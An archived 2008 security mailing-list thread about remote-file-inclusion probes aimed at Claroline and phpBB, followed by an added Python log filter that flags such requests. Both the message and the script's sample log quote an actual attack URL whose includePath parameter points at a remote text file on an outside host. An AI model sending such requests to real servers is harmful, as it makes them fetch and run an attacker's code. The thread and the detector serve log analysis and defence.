[VIM] RFI BotNet and phpBB 0-day?
jericho at attrition.org
Thu Mar 20 19:34:26 UTC 2008
: Dunno if it's a botnet but given Gadi's paper from last year on web
: server compromises, it's a really good theory.
I say that based on a few things I've seen, and I bet a real analysis
would very quickly prove or disprove the theory.
: > > /claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f
: I looked at the 2.0.23 source.
: Using phpBB2 code: page_tail.php is in includes/ - so I wouldn't expect a
: /claroline/phpbb/page_tail.php to work. So, this is probably Claroline.
Well, don't base it just on that path. I see a LOT of obvious path request
I see these a hundred times a day and obviously will not work. So seeing
/claroline/ in front of the /phpbb/ request was odd, but I didn't take it
to mean it was necessarily claroline, even though it may be.
: But - no apparent luck:
: and no mention of includePath in that file.
: claro_init_footer.inc.php seems clean.
: Similar for 1.64.
: However - $includePath is used all over the place in Claroline, and
: apparently uses an unset(), so maybe there's a relationship with an unset
: 1.42 ZIP file seems corrupted, so I couldn't check it out.
Looks like an issue in Claroline 1.5.x fixed with the release of 1.5.5
back in 2006:
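
Added example (not part of the original message): a small Python log filter that flags requests like the one quoted above, where a query parameter carries a remote URL. The log lines are constructed; only the first request path comes from the thread, and the function name and finding fields are this example's own.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (combined log format). Only the first request
# path comes from the thread; clients, times and status codes are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [20/Mar/2008:19:01:02 +0000] "GET /claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f HTTP/1.1" 404 312
192.0.2.11 - - [20/Mar/2008:19:01:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120
192.0.2.12 - - [20/Mar/2008:19:01:09 +0000] "GET /redirect.php?url=https%3A%2F%2Fexample.org%2Fhome HTTP/1.1" 302 0
"""

# client, method, request target, status from a combined-format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# parameter value that is itself a remote URL
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def find_remote_includes(log_text):
    """Return one finding per query parameter whose decoded value is a URL."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, target, status = m.group(1), m.group(3), int(m.group(4))
        script, _, query = target.partition("?")
        # parse_qsl percent-decodes, so %3f%3f becomes "??"
        for param, value in parse_qsl(query, keep_blank_values=True):
            if not REMOTE_URL_RE.match(value):
                continue
            findings.append({
                "client": client,
                "script": script,
                "param": param,
                "remote_host": urlsplit(value).hostname,
                # A trailing "?" is typical of include probes and rare in
                # ordinary redirect parameters, so use it to rank findings.
                "trailing_q": value.endswith("?"),
                "status": status,
            })
    return findings


if __name__ == "__main__":
    for f in find_remote_includes(SAMPLE_LOG):
        kind = "likely RFI probe" if f["trailing_q"] else "remote URL in parameter"
        print(f'{f["client"]} {f["status"]} {f["script"]} {f["param"]} -> {f["remote_host"]} ({kind})')
```

Grouping the findings by `script` and `param` shows which application paths are being probed, and the `status` field separates blind path guesses (404) from requests that reached a real script.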